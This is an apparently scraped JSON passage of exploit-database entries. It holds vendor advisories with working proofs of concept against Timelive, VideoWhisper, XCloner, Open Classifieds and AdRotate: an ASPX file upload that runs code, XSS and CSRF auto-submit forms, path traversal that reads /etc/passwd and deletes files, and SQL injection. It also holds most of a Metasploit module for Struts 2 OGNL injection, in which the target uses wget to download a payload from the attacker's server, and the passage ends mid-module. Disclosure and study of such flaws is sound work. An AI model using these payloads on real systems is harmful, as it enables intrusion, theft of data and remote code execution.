exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-01-24T19:20:15", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2014-04-24T00:00:00", "published": "2014-04-24T00:00:00", "id": "1337DAY-ID-22178", "href": "https://0day.today/exploit/description/22178", "type": "zdt", "title": "Livetecs Timelive 6.2.71 Unauthenticated Access / File Upload Vulnerabilities", "sourceData": "Vulnerability title: Unauthenticated access to sensitive information and\r\nfunctionality in Livetecs Timelive\r\nCVE: CVE-2014-1217\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.2.8\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was possible to access a URL that allowed unauthenticated access\r\nto sensitive configuration change functionality, and also revealed the\r\ndatabase connection\r\nstring (including authentication 
credentials) used by TimeLive to access\r\nthe database.\r\n\r\nThe following URL was identified:\r\nhttp://MyTimeLiveServer/home/systemsetting.aspx\r\n\r\nNote: This URL was identified by entering \"timelive default credentials\"\r\ninto the Google\r\nInternet search engine. At time of writing the URL was revealed by the\r\nfirst result returned\r\nby Google.\r\n\r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1217/\r\n\r\nVulnerability title: Unrestricted file upload in Livetecs Timelive\r\nCVE: CVE-2014-2042\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.5.1\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was discovered that it was possible for low-level TimeLive\r\napplication users to upload\r\nfiles (by using the \"My Projects\"..\"Manage Project\" functionality).\r\nThere was no restriction on\r\nfile types that could be uploaded and the permissions applied to those\r\nuploaded files included\r\n\"Read and Execute\".\r\n\r\n1. Using any text editor create a new file \"run-cacl.aspx\" and add the\r\nfollowing content:\r\n\r\n<%@ Page Language=\"VB\" %>\r\n <%\r\n System.Diagnostics.Process.Start(\"calc.exe\")\r\n %>\r\n\r\n2. Login to the TimeLive application as a low-level (standard) user\r\n3. Click \"My Projects\" from the left-hand menu\r\n4. Click the \"Manage\" icon - It looks like a notepad and pen\r\n5. Scroll to the bottom of the page that opens and click \"Attachment\"\r\n6. Click \"Browse\" and navigate to where you saved \"run-cacl.aspx\"\r\n7. Click \"Upload\"\r\n8. Logout of TimeLive [Optional]\r\n9. On the server hosting the TimeLive application run \"TaskMgr\"\r\n10. Browse to http://MyTimeLiveURL/Uploads/1/1/run-cacl.aspx\r\n11. 
Observe \"calc.exe\" running as \"NETWORK_SERVICE\" in the Task manager\r\nNote: Depending on the configuration of the TimeLive application used\r\nfor testing it may be\r\nnecessary to change the \"1/1\" part of the URL.\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2042/\n\n# 0day.today [2018-01-24] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22178"}, {"lastseen": "2018-03-28T03:18:48", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2014-02-28T00:00:00", "published": "2014-02-28T00:00:00", "id": "1337DAY-ID-21955", "href": "https://0day.today/exploit/description/21955", "type": "zdt", "title": "Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities", "sourceData": "Product: VideoWhisper Live Streaming Integration\r\nVendor: VideoWhisper\r\nVulnerable Version(s): 4.27.3 and probably prior\r\nTested Version: 4.27.3\r\nAdvisory Publication: February 6, 2014 [without technical details]\r\nVendor Notification: February 6, 2014\r\nVendor Patch: February 7, 2014\r\nPublic Disclosure: February 27, 2014\r\nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]\r\nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908\r\nRisk Level: Critical\r\nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n------------------------------------------------------------------------\r\n-----------------------\r\n \r\nAdvisory 
Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.\r\n \r\n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905\r\n \r\nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system.\r\n \r\nThe following PoC code demonstrates exploitation of the vulnerability:\r\n \r\nAfter successful exploitation the remote shell will be accessible via the following URL:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg\r\n \r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\r\n \r\n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906\r\n \r\n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin's widget. 
The script will be also executed in administrative section on the following page:\r\n \r\nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.p\r\nhp&tab=live\r\n \r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"u\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n \r\n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatl\r\nog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page.\r\n \r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/vc_chatlog.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n</form>\r\n</body>\r\n \r\nThe code will be executed when the user visits the following URL:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/uploads/[room]/Log[date].html\r\n \r\nWhere [room] is set by HTTP POST parameter r and [date] is the current date.\r\n \r\n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP 
GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3\r\nE\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%\r\n3E\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/sc\r\nript%3E\r\n \r\n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logou\r\nt.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/\r\nscript%3E\r\n \r\n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. 
A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n \r\n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status\r\n.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/v_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n \r\n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907\r\n \r\n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nin.php\" script. 
A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.\r\n \r\nThe exploitation example below displays contents of \"/etc/passwd\" file:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n \r\n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.\r\n \r\nThe exploitation example below deletes a file \"/tmp/immuniweb\":\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\r\n \r\nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system.\r\n \r\n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908\r\n \r\n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. 
A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application.\r\n \r\nThe following URL can be used to gain knowledge of full installation path of the application:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/bp.php\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/videowhisper_streaming.php\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp.inc.php\r\n \r\n------------------------------------------------------------------------\r\n-----------------------\r\n \r\nSolution:\r\n \r\nUpdate to VideoWhisper Live Streaming Integration version 4.29.5\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21955"}, {"lastseen": "2018-01-10T01:12:35", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2014-04-04T00:00:00", "published": "2014-04-04T00:00:00", "id": "1337DAY-ID-22100", "href": "https://0day.today/exploit/description/22100", "type": "zdt", "title": "Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability", "sourceData": "Product: XCloner Wordpress plugin\r\nVendor: XCloner\r\nVulnerable Version(s): 3.1.0 and probably prior\r\nTested Version: 3.1.0\r\nAdvisory Publication: March 12, 2014 [without technical details]\r\nVendor Notification: March 12, 2014\r\nVendor Patch: March 13, 2014\r\nPublic Disclosure: April 2, 2014\r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-2340\r\nRisk Level: Low\r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n 
\r\n-----------------------------------------------------------------------------------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.\r\n \r\n \r\nCross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340\r\n \r\nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.\r\n \r\nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL:\r\n \r\n \r\n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"dbbackup\" value=\"1\">\r\n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\">\r\n<input type=\"hidden\" name=\"bname\" value=\"backup\">\r\n<input type=\"hidden\" name=\"backupComments\" value=\"\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_cloner\">\r\n<input type=\"hidden\" name=\"task\" value=\"generate\">\r\n<input type=\"hidden\" name=\"boxchecked\" value=\"0\">\r\n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\">\r\n<input type=\"hidden\" name=\"\" value=\"\">\r\n<input type=\"submit\" name=\"run\" value=\"run\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n \r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nUpdate to XCloner 3.1.1\r\n \r\nMore Information:\r\nhttp://www.xcloner.com/support/download/?did=9\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nReferences:\r\n \r\n[1] 
High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - Cross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.\r\n[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22100"}, {"lastseen": "2018-01-01T23:02:14", "bulletinFamily": "exploit", "description": "Open Classifieds version 2-2.1.2 suffers from a cross site scripting vulnerability.", "modified": "2014-03-13T00:00:00", "published": "2014-03-13T00:00:00", "id": "1337DAY-ID-22022", "href": "https://0day.today/exploit/description/22022", "type": "zdt", "title": "Open Classifieds 2-2.1.2 Cross Site Scripting Vulnerability", "sourceData": "Product: Open Classifieds\r\nVendor: Open Classifieds Team\r\nVulnerable Version(s): 2-2.1.2 and probably prior\r\nTested Version: 2-2.1.2\r\nAdvisory Publication: February 19, 2014 [without technical details]\r\nVendor Notification: February 19, 2014 \r\nVendor 
Patch: February 20, 2014 \r\nPublic Disclosure: March 12, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-2024\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Open Classifieds, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Open Classifieds: CVE-2014-2024\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed via the URI to \"/shared-apartments-rooms/\" URL. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22)</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Open Classifieds 2-2.1.3\r\n\r\nMore Information:\r\nhttps://github.com/open-classifieds/openclassifieds2/issues/556\r\nhttps://github.com/open-classifieds/openclassifieds2/commit/45ee8fb601a91b8a4238229580a32a4fd8d96ef9\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22022"}, {"lastseen": "2018-04-09T03:37:54", "bulletinFamily": "exploit", "description": "AdRotate version 3.9.4 suffers from a remote SQL injection vulnerability.", "modified": "2014-02-21T00:00:00", "published": 
"2014-02-21T00:00:00", "id": "1337DAY-ID-21932", "href": "https://0day.today/exploit/description/21932", "type": "zdt", "title": "AdRotate 3.9.4 SQL Injection Vulnerability", "sourceData": "Vendor: AJdG Solutions\r\nVulnerable Version(s): 3.9.4 and probably prior\r\nTested Version: 3.9.4\r\nAdvisory Publication: January 30, 2014 [without technical details]\r\nVendor Notification: January 30, 2014 \r\nVendor Patch: January 31, 2014 \r\nPublic Disclosure: February 20, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-1854\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.\r\n\r\n\r\n1) SQL Injection in AdRotate: CVE-2014-1854\r\n\r\nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to\r\n \"/wp-content/plugins/adrotate/library/clicktracker.php\" script. 
A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version:\r\n\r\nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==\r\n\r\nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server:\r\nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to AdRotate 3.9.5\r\n\r\nMore Information:\r\nhttp://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/\r\nhttp://wordpress.org/plugins/adrotate/changelog/\r\nhttp://www.adrotateplugin.com/development/\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21932"}, {"lastseen": "2018-04-13T03:42:50", "bulletinFamily": "exploit", "description": "The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \"redirectAction:\" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. 
This Metasploit module has been tested successfully on Struts 2.3.15 over Tomcat 7, with Windows 2003 SP2 and Ubuntu 10.04 operating systems.", "modified": "2013-07-26T00:00:00", "published": "2013-07-26T00:00:00", "id": "1337DAY-ID-21032", "href": "https://0day.today/exploit/description/21032", "type": "zdt", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\r\n 'Description' => %q{\r\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\r\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\r\n a desired navigational target expression. This mechanism was intended to help with\r\n attaching navigational information to buttons within forms.\r\n\r\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\r\n \"redirectAction:\" is not properly sanitized. 
Since said information will be\r\n evaluated as OGNL expression against the value stack, this introduces the\r\n possibility to inject server side code.\r\n\r\n This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with\r\n Windows 2003 SP2 and Ubuntu 10.04 operating systems.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Takeshi Terada', # Vulnerability discovery\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit modules\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2251' ],\r\n [ 'OSVDB', '95405' ],\r\n [ 'BID', '61189' ],\r\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\r\n ],\r\n 'Platform' => [ 'win', 'linux'],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => 'Jul 2 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\r\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\r\n # It isn't OptPath because it's a *remote* path\r\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\r\n ], self.class)\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type == \"meterpreter\"\r\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\r\n end\r\n\r\n @dropped_files.delete_if do |file|\r\n false unless file =~ /\\.exe/\r\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\r\n if session.type == \"meterpreter\"\r\n begin\r\n wintemp = session.fs.file.expand_path(\"%TEMP%\")\r\n win_file = \"#{wintemp}\\\\#{win_file}\"\r\n 
session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\r\n session.fs.file.rm(win_file)\r\n print_good(\"Deleted #{file}\")\r\n true\r\n rescue ::Rex::Post::Meterpreter::RequestError\r\n print_error(\"Failed to delete #{win_file}\")\r\n false\r\n end\r\n end\r\n end\r\n\r\n super\r\n end\r\n\r\n def start_http_service\r\n #do not use SSL\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\r\n start_service({\r\n 'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => '/'\r\n }\r\n })\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n\r\n return service_url\r\n end\r\n\r\n def check\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n print_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def auto_target\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? 
or res.code != 200\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\")\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n if res.headers['Location'] =~ /:\\\\/\r\n return targets[1] # Windows\r\n else\r\n return targets[2] # Linux\r\n end\r\n end\r\n\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\r\n\r\n end\r\n\r\n def exploit_linux\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n @pl = @exe\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # download payload\r\n #\r\n fname = datastore['WritableDir']\r\n fname = \"#{fname}/\" unless fname =~ %r'/$'\r\n fname << downfile\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? 
